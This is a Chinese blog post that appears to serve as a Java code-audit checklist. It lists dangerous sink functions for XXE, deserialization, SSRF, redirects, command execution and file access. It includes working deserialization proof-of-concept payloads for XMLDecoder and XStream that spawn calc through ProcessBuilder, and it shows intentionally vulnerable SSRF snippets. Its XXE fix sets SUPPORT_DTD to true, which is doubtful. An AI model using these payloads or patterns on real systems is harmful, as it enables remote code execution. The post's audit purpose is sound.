JAVA代码审计中危险函数

最新推荐文章于 2023-09-06 00:34:49 发布
最新推荐文章于 2023-09-06 00:34:49 发布
阅读量2.7k 收藏 9
点赞数 1
分类专栏: 资源 文章标签: java xml 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/122166048
版权

JAVA代码审计中危险函数

xxe:

javax.xml.parsers.DocumentBuilder   (原生dom解析xml)

例子:

DocumentBuilderFactory doc=DocumentBuilderFactory.newInstance();
DocumentBuilder db=doc.newDocumentBuilder();
InputStream is= new  FileInputStream("test.xml");    
Document doc=dombuilder.parse(is);   #注入点
Element rootElement = document.getDocumentElement();

javax.xml.stream.XMLStreamReader    (StAX解析器,可读可写)

例子:

XMLInputFactory factory = XMLInputFactory.newFactory();
InputStream stream = XmlInputFactory.class.getClassLoader().getResourceAsStream("webService/xml/users.xml");
XMLStreamReader reader = factory.createXMLStreamReader(stream);   #注入点
while (reader.hasNext()) {...}

 javax.xml.parsers.SAXParser  /  org.xml.sax.XMLReader  (原生SAX解析xml)

例子:

SAXParserFactory factory = SAXParserFactory.newInstance();
SAXParser parser = factory.newSAXParser();
XMLReader reader = parser.getXMLReader();   //reader.setContentHandler(new MyContentHandler());
reader.parse(xmlPath);    #注入点

org.jdom.input.SAXBuilder  /  org.jdom2.input.SAXBuilder   (jdom解析xml)

例子:

SAXBuilder sax = new SAXBuilder();
Document doc = sax.build("src/config.xml");    #注入点

org.dom4j.io.SAXReader    (dom4j解析xml)

例子:

InputStream fis=new FileInputStream("F:\\eclipsewk\\SDK201702\\Test-Pack\\package\\work\\before\\AndrdManit.xml");
Document document = new SAXReader().read(fis);   #注入点

javax.xml.validation.SchemaFactory    (校验xml)

例子:

File xsdfile=new File("xml/orders.xsd");
File xmlfile=new File("xml/orders.xml");
Handler errorHandler=new Handler();
SchemaFactory schemafactory=SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema"); //
Schema schema=schemafactory.newSchema(xsdfile);
Validator vaildator=schema.newValidator();
vaildator.setErrorHandler((ErrorHandler) errorHandler);
vaildator.validate(new StreamSource(xmlfile));   #注入点

javax.xml.bind.Unmarshaller    (JAXB解析xml,也是实现java和xml的转换)

例子:

JAXBContext jc = JAXBContext.newInstance(clazz);
Unmarshaller u = jc.createUnmarshaller();
u.unmarshal(new File(xmlstr));    #注入点

修复方法:

xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);

xif.setProperty(XMLInputFactory.SUPPORT_DTD, true);

javax.xml.xpath.XPathExpression   (XPath查询)

DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();    
DocumentBuilder builder = df.newDocumentBuilder();
String result = new XPathExpression().evaluate(builder.parse(new ByteArrayInputStream(xml.getBytes())));

值得注意的是:javax.xml.xpath.XPathExpression类似于Unmarshaller,它无法自行安全地配置,因此必须首先通过另一个安全的XML解析器解析不受信任的数据

javax.xml.transform.sax.SAXSource 、javax.xml.transform.TransformerFactory  、javax.xml.transform.sax.SAXTransformerFactory    (生成和转换xml)

Apache Commons Configuration读取xml配置

XMLConfiguration.load

代码审计的时候感觉一个个搜索也很麻烦,在使用脚本前可以先全局搜索下DocumentBuilder、sax、Unmarshaller 、XPath、XMLInputFactory等字眼

反序列化漏洞:

ObjectInputStream.readObject  //最常见的反序列化sink点,将流转化为object对象

ObjectInputStream.readUnshared  //使用较少,和readobject有些区别

 readUnshared()方法来读取对象,readUnshared()不允许后续的readObject和readUnshared调用引用这次调用反序列化得到的对象,而readObject读取的对象可以。

XMLDecoder.readObject  //读取xml转化为object,不能进行xxe。

poc:

<java>
        <object class="java.lang.ProcessBuilder">
            <array class="java.lang.String" length="1" >
                <void index="0">
                    <string>c:\\windows\\system32\\calc.exe</string>  
                </void>
            </array>
            <void method="start"/>
        </object>
    </java>

XStream.fromXML   //XStream用于java object与xml的相互转换,XStream.toXML(将java转换为xml) 

String payload = "<map><entry><jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\"> <dataHandler> <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\"> <is class=\"javax.crypto.CipherInputStream\"> <cipher class=\"javax.crypto.NullCipher\"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class=\"javax.imageio.spi.FilterIterator\"> <iter class=\"javax.imageio.spi.FilterIterator\"> <iter class=\"java.util.Collections$EmptyIterator\"/> <next class=\"java.lang.ProcessBuilder\"> <command><string>calc</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class=\"javax.imageio.ImageIO$ContainsFilter\"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class=\"string\">foo</next> </serviceIterator> <lock/> </cipher> <input class=\"java.lang.ProcessBuilder$NullInputStream\"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/> <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/></entry></map>";

一些第三方jar包中的,这些第三方jar包历史版本中存在序列化漏洞 

ObjectMapper.readValue    jackson中的api
JSON.parseObject    fastjson中的api

Yaml.load

审计的时候搜索readobject、readUnshared、fromXML这些关键api

SSRF(服务器端请求伪造):

HttpClient.execute
HttpClient.executeMethod

HttpURLConnection/URLConnection

// HttpURLConnection ssrf vul
String url = request.getParameter ( "url");
URL u = new URL(url);
  URLConnection urlconnection = u.openConnection( );
HttpURLConnection httpUrl = (HttpURLConnection)urlConnection;
BufferedReader in = new BufferedReader(new InputStreamReader(httpUrl.getInputStream()));//触发漏洞String inputLine;
  StringBuffer html = new StringBuffer();
  while ( ( inputLine = in.readLine( )) != null) {
                html.append ( inputLine);
               }
System.out.println( "html : " + html.toString());
in.close();

new  HttpGet(url)

String url = request.getParameter ( "url");
closeableHttpClient client = HttpClients.createDefault();
HttpGet httpGet = new HttpGet( url) ;
HttpResponse httpResponse = client.execute(httpGet);//发起请求

OkHttpClient()

String url = request.getParameter( "url");
okHttpclient client = new okHttpclient();
com.squareup.okhttp.Request ok_http = new com .squareup.okhttp.Request.Builder().url(ur1) .build() ;
client.newCall(ok_http).execute();//发起请求

URL:URL   url = new URL()

url.openStream、ImageIO.read(url)

// ImageIo ssrf vul
String url = request.getParameter ( "url");
URL u = new URL(url);
BufferedImage img = ImageIo.read(u); //触发漏洞

其他

String url = request.getParameter( "url");
return Request.Get(url).execute( ) .returncontent( ).toString();//发起请求

审计的时候搜索new URL、HttpClient、HttpURLConnection

文件上传:

审计的时候搜索MultipartFile

Autobinding    //参数自动绑定漏洞:

审计的时候搜索@SessionAttributes和@ModelAttribute,属于SpringMVC框架

URL跳转漏洞:

response.sendRedirect  //重定向

response.setHeader("Location", "http://www.baidu.com");      // 也是重定向

request.getRequestDispatcher("/success.html").forward(request, response);     //请求转发

命令执行:

Runtime.exec             //Runtime.getRuntime().exec(command)
ProcessBuilder.start    //new ProcessBuilder(cmdArray).start(),取代了Process
GroovyShell.evaluate    //主要用于在java中运行Groovy脚本

shell.evaluate("

  static void main(String[]args){

    Runtime.getRuntime().exec(command);

  }

");

类似的还有GroovyClassLoader 、ScriptEngine

文件操作相关的漏洞:

最常见的就是JDK原始的java.io.FileInputStream类

JDK1.7新增的基于NIO读取文件的java.nio.file.Files类。常用方法如:Files.readAllBytes、Files.readAllLines

JDK原始的java.io.RandomAccessFile类

Apache Commons IO提供的org.apache.commons.io.FileUtils类

JDK1.7新增的基于NIO非阻塞异步读取文件的java.nio.channels.AsynchronousFileChannel类

JAVA代码审计自动化工具

地址

部分java代码分析,勿喷!!!

xzhome
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python-java源代码危险函数识别prog
08-10
java源代码危险函数识别prog
代码审计工具Findbugs自动检查CheckList及配置方法
10-21
代码审计工具Findbugs是一个开源的代码审计工具,广泛应用于软件开发。Findbugs能够自动检查代码的安全漏洞和错误,从而提高软件产品的安全性和可靠性。 配置文件的位置 Findbugs的配置文件位于workspace\....
java危险函数
任浩的博客
01-13 1198
getParameter() getcokies() getQueryString() getheaders() Runtime.exec() logger.info() password() upload() download()
java危险函数
最新发布
愿路途漫长,莫失莫忘。 愿不骄不躁,安稳顺心。
09-06 313
日志输出,可造成信息泄露的风险。最后再给大家介绍以下。
java危险函数_java源代码危险函数识别prog
weixin_34000790的博客
02-26 165
JavaIDjava source code danger function identify progHow does it work?JavaID identify some dangerous functions in java source code by way of regular matching.For further details, check out the source c...
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
攻击者可以通过构造特定的JSON字符串,诱使Fastjson将其解析为包含恶意函数调用的对象,从而实现远程代码执行。 对于开发者来说,防范这类漏洞的关键在于理解和应用安全最佳实践。首先,确保使用最新版本的Fastjson...
信息安全_浅谈Android自动化审计.pptx
08-14
【基于Java的自动化审计】通常涉及反编译APK至Java代码,如使用Dex2jar和jd-gui或jeb。这种方法可以提供相对准确的分析结果,但由于基于关键词匹配,可能存在误报和漏报问题,且反编译过程耗时较长。 【基于Smali的...
Java安全技术.pptx
10-04
字节码验证器确保代码符合Java语言规范,不会执行危险操作,如直接操作内存或执行非法类型转换。 安全管理器(Security Manager)是实现强制访问控制的关键组件。当程序试图执行可能影响系统安全性的操作时,如打开...
为什么函数式编程在Java危险
12-22
摘要:函数式编程这个不温不火的语言由来已久。有人说,这一年它会很火,尽管它很难,这也正是你需要学习的理由。那么,为什么函数式编程在Java危险呢?也许这个疑问普遍存在于很多程序员的脑,作者Elliotte对此发表了一些见解,我们一起来看看他是怎么说的。   在我的日常工作,我身边的开发者大多是毕业于CS编程院校比如MIT、CMU以及Chicago,他们初次涉及的语言是Haskell、Scheme及Lisp。他们认为函数式编程是一种自然的、直观的、美丽的且高效的编程样式。但奇怪的是,我和我的同事并没有为Haskell、Scheme、Lisp、Clojure、Scala而编程,这个行业
JAVA代码审计常用漏洞总结
12-11
主要代码审计方法是跟踪用户输入数据和敏感函数参数回溯: 跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可利用的点,此处的代码逻辑 可以是一个函数,或者是条小小的条件判断语句。 敏感函数参数回溯,根据敏感函数,逆向追踪参数传递的过程。这个方法是最高效,最常用 的方法。大多数漏洞的产生是因为函数的使用不当导致的,只要找到这些函数,就能够快速挖掘想要的漏洞。
Java源代码危险函数
糖小喵
04-12 1155
JavaID通过常规匹配来识别Java源代码的某些危险函数。 有关更多详细信息,请在主站点github.com/Cryin/JavaID上查看源代码。 XXE: "SAXReader", "DocumentBuilder", "XMLStreamReader", "SAXBuilder", "SAXParser", "XMLReader", "SA...
java代码审计ssrf危险函数_Java Web代码审计流程与漏洞函数
weixin_39847034的博客
02-28 1026
常见框架与组合常见框架Struts2SpringMVCSpring Boot框架执行流程View层:视图层Controller层:表现层Service层:业务层Dom层:持久层常见组合Spring+Struts2+HibernateSpring+SpringMVC+MybatisSpring Boot+Mybatis代码审计方法根据业务功能审计优点:明确程序的架构以及业务逻辑,明确数据流向,可以从...
java危险函数,Java - 在构造函数泄露它
weixin_31715171的博客
02-26 127
I'd like to avoid (most of the) warnings of Netbeans 6.9.1, and I have a problem with the 'Leaking this in constructor' warning.I understand the problem, calling a method in the constructor and passin...
危险函数
晨风
10-19 2427
1.strcmy int strcmy(const char* str1, const char* str2)
高危函数
雪雪
02-24 418
java危险函数_为什么函数式编程在Java危险
weixin_42345036的博客
02-26 215
在我的日常工作,我身边的开发者大多是毕业于CS编程顶级院校比如MIT、CMU以及Chicago,他们初次涉及的语言是Haskell、Scheme及Lisp。他们认为函数式编程是一种自然的、直观的、美丽的且高效的编程样式。但奇怪的是,我和我的同事并没有为Haskell、Scheme、Lisp、Clojure、Scala而编程,这个行业里的绝大部分人都会使用Python、 Ruby、Java或C#等...
WEB代码审计与渗透测试:寻找变量与危险函数
在进行代码审计时,审计人员应深入理解变量如何在程序流动,哪些函数处理这些变量,以及如何识别和防止潜在的危险。通过对变量和函数的深入分析,可以有效地发现和修复安全问题,提升软件的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值